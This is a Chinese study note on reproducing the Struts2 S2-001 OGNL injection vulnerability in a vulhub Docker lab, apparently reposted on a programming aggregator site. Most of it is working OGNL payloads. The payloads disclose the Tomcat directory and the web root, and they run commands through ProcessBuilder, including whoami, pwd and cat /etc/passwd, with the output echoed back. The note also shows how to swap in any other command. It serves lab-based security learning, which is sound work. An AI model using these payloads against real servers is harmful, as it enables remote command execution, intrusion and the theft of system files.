Struts2 漏洞S2-001复现学习笔记

S2-001复现

原理：该漏洞因用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析，然后重新填充到对应的表单数据中。如注册或登录页面，提交失败后一般会默认返回之前提交的数据，由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析，所以可以直接构造 Payload进行命令执行。

漏洞环境搭建

https://github.com/vulhub/vulhub/tree/master/struts2/s2-001

运行以下命令进行设置

docker-compose build
docker-compose up -d

访问 http://127.0.0.1:8080/

漏洞poc测试

1.输入**%{‘123’}**，sumbit

2.返回123，参数值，证明漏洞存在

构造poc

1. 获取tomcat路径：

   %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
   

语句执行后，查看返回的语句信息：

2. 获取网站真实路径：

   %{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
   

3. 构造查看权限的poc：

   %{
   
   #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
   
   #b=#a.getInputStream(),
   
   #c=new java.io.InputStreamReader(#b),
   
   #d=new java.io.BufferedReader(#c),
   
   #e=new char[50000],
   
   #d.read(#e),
   
   #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
   
   #f.getWriter().println(new java.lang.String(#e)),
   
   #f.getWriter().flush(),#f.getWriter().close()
   
   }
   

4. 执行任意命令只需要将上面的poc中whoami替换：

   %{
   
   #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
   
   #b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),
   
   #d=new java.io.BufferedReader(#c),
   
   #e=new char[50000],#d.read(#e),
   
   #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
   
   #f.getWriter().println(new java.lang.String(#e)),
   
   #f.getWriter().flush(),
   
   #f.getWriter().close()
   
   }
   

5. 执行命令（带参数的命令：new java.lang.String[]{"cat","/etc/passwd"}）：

   %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
   

关闭docker环境

命令：docker-compose down -v

最后

以上就是潇洒宝马为你收集整理的Struts2漏洞S2-001复现Struts2 漏洞S2-001复现学习笔记的全部内容，希望文章能够帮你解决Struts2漏洞S2-001复现Struts2 漏洞S2-001复现学习笔记所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。